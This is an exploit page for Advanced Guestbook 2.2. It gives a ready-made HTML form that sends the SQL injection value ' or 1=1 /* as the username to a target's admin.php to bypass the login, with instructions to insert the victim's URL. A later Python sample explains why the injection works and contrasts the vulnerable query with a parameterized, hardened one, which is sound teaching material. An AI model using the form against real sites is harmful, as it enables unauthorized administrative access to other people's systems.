Advanced Guestbook version 2.2 suffers from a SQL injection flaw in the username variable. The SQL injection flaw for the password variable was discovered for this same version back in April of 2004.
f61e489b60efad5c4eda08398798cbbdef01b872ac38d8958e369bbe80739c1a
In GOD We Trust;
Kachal667 Under9round Team (KuT)
New exploit with HTML for Advanced Guestbook 2.2.
This bug was found by BHST.
Coded By Hessam-x
Note: To use this exploit, first change [target] to the victim, for example: www.targetsite.com/guestbook/admin.php
=====HTML CODE :
<html>
<title>GuestBook 2.2 exploit</title>
<B>Guest Book 2.2 Exploit - coded by Hessam-x - </B>
<B>change "[target]" to Target in source code</B>
<!-- CHANGE [target] to target url / coded by hessam-x @ Kachal667 underground Team -->
<form method="POST" action="http://[target]/admin.php">
<input type="hidden" name="username" value=" ' or 1=1 /*">
<input type="hidden" name="password" value="">
<input type="hidden" name="enter" value="1">
<center><input type="submit" value="GO" class="input"></center>
</form>
</html>
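Why the hidden username value in the form above gets past a login check, and the fix, shown as an added example that is not Advanced Guestbook's own code. It assumes a login query built by string concatenation; the `auth` table, its columns and the function names are hypothetical, and an in-memory SQLite database stands in for the application's backend.

```python
import hashlib
import hmac
import sqlite3

# Value of the hidden "username" field in the form on this page.
PAGE_USERNAME = " ' or 1=1 /*"


def pw_hash(password):
    # Fixed salt keeps the sample short; use a per-user random salt in practice.
    return hashlib.pbkdf2_hmac("sha256", password.encode(),
                               b"constructed-salt", 100_000).hex()


def make_db():
    # Constructed schema and account (assumed names, not the real application's).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE auth (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)")
    db.execute("INSERT INTO auth (username, pw_hash) VALUES (?, ?)",
               ("admin", pw_hash("correct horse")))
    return db


def login_vulnerable(db, username, password):
    # Input is pasted into the statement text: the quote in `username` closes
    # the string literal, "or 1=1" becomes part of the WHERE clause, and "/*"
    # comments out the password comparison that follows.
    sql = ("SELECT id FROM auth WHERE username='%s' AND pw_hash='%s'"
           % (username, pw_hash(password)))
    return db.execute(sql).fetchone() is not None


def login_hardened(db, username, password):
    # Bound parameter: `username` is only ever compared as data, never parsed.
    row = db.execute("SELECT pw_hash FROM auth WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    # The password check happens in application code, in constant time.
    return hmac.compare_digest(row[0], pw_hash(password))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAGE_USERNAME, ""))
    print("hardened:  ", login_hardened(db, PAGE_USERNAME, ""))
```

Run directly, the script prints the result of both checks for the page's input with an empty password.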